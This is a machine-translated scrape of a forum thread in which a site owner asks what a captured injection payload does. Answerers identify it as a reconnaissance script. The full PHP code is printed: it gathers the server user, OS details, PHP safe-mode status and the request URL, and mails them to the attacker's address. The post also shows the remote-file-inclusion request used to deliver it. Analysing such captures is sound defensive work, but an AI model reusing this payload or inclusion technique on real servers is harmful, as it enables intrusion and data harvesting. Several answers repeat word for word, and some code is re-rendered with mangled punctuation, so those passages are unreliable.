Javascript 脚本kiddie用这个片段淹没了我的网站

Javascript 脚本kiddie用这个片段淹没了我的网站,javascript,php,security,Javascript,Php,Security,这里有人试图用一些脚本淹没我的网站。幸运的是,我的申请抓住了它 我只想知道这个代码在做什么 <script> <!-- document.write(unescape("<?php //================================= // // scan inb0x hotmail v3.0 // // coded by FilhOte_Ccs and LOST // re-c0d3d by delet // // //================

这里有人试图用一些脚本淹没我的网站。幸运的是,我的申请抓住了它

我只想知道这个代码在做什么

<script>
<!--
document.write(unescape("<?php
//=================================
//
// scan inb0x hotmail v3.0
//
// coded by FilhOte_Ccs and LOST
// re-c0d3d by delet
//
//
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
 if ($SafeMode == '') { $SafeMode = "OFF"; }
 else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Seguran?a</i> = " . $SafeMode . "
http://" . $delet . " 

Muito obrigado por comprar o hehe1 com: <u>delet</u>");
$email = "inbox200905@hotmail.com";
$assunto = "lup@";
$email1 = "inbox200905@hotmail.com";
$headers = "From: <$email>\r\n";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "N?o foi.";
exit();
}
?>
"));
//-->
</script>


他试图做这样的事情:
mysite/index.php?dll=http://www.forms.dgpj.mj.pt/box2.txt?

看起来此脚本仅收集和发送一些信息到
inbox200905@hotmail.com
地址:

  • 在服务器上执行php脚本的用户的名称
  • 安装在服务器上的操作系统的名称
  • 已启用
  • 还有它的url和脚本名

我认为此脚本仅用于查找可用于攻击的服务器

看起来此脚本仅收集和发送一些信息到
inbox200905@hotmail.com
地址:

  • 在服务器上执行php脚本的用户的名称
  • 安装在服务器上的操作系统的名称
  • 已启用
  • 还有它的url和脚本名
我认为此脚本仅用于查找可用于攻击的服务器

编辑:正如格雷格·休吉尔(Greg Hewgill)在一篇评论中指出的那样,即使没有什么有用的报告,这个也有可能运行,这是一个不容忽视的问题

它似乎正在尝试获取“$SafeMode”统计信息,以便将来可能利用此漏洞:

...
$dados=("<b>Produto</b> = " . $UNAME . " // server/OS info
<i>Seguran?a</i> = " . $SafeMode . "     // is PHP safe mode off? on? what?
http://" . $delet . "                    // full request URI
...
$email = "inbox200905@hotmail.com";      // who is harvesting
...
if(mail($email1,$assunto,$dados,$headers)){ // harvest via. mail
。。。
$dados=(“Produto=”.$UNAME.//服务器/OS信息
Seguran?a=“.$SafeMode.”//PHP安全模式关闭了吗?打开了吗?什么?
http://“$delet.”//完整请求URI
...
$email=”inbox200905@hotmail.com“;//谁在收割
...
如果(邮件($email1,$assunto,$dados,$headers)){//harvest via.mail
Dolt未能将他查找到的用户发回。弱酱。

编辑:正如Greg Hewgill在评论中指出的那样,即使没有什么有用的报告,这个也有可能运行,这是一个不容忽视的问题

它似乎正在尝试获取“$SafeMode”统计信息,以便将来可能利用此漏洞:

...
$dados=("<b>Produto</b> = " . $UNAME . " // server/OS info
<i>Seguran?a</i> = " . $SafeMode . "     // is PHP safe mode off? on? what?
http://" . $delet . "                    // full request URI
...
$email = "inbox200905@hotmail.com";      // who is harvesting
...
if(mail($email1,$assunto,$dados,$headers)){ // harvest via. mail
。。。
$dados=(“Produto=”.$UNAME.//服务器/OS信息
Seguran?a=“.$SafeMode.”//PHP安全模式关闭了吗?打开了吗?什么?
http://“$delet.”//完整请求URI
...
$email=”inbox200905@hotmail.com“;//谁在收割
...
如果(邮件($email1,$assunto,$dados,$headers)){//harvest via.mail
Dolt无法将他查找的用户发回。酱汁太淡。

这是一个通知脚本,即 用于向…发送通知邮件 攻击者,寻找更易受攻击的 服务器:)

这是一个通知脚本,即 用于向…发送通知邮件 攻击者,寻找更易受攻击的 服务器:)


它无法捕获用户。这是一个失败:)“没有危险吗?”当然,如果外部方可以在您的服务器上执行任意代码,这是危险的。它无法捕获用户。这是一个失败:)“没有危险吗?”当然,如果外部方可以在您的服务器上执行任意代码,这是危险的。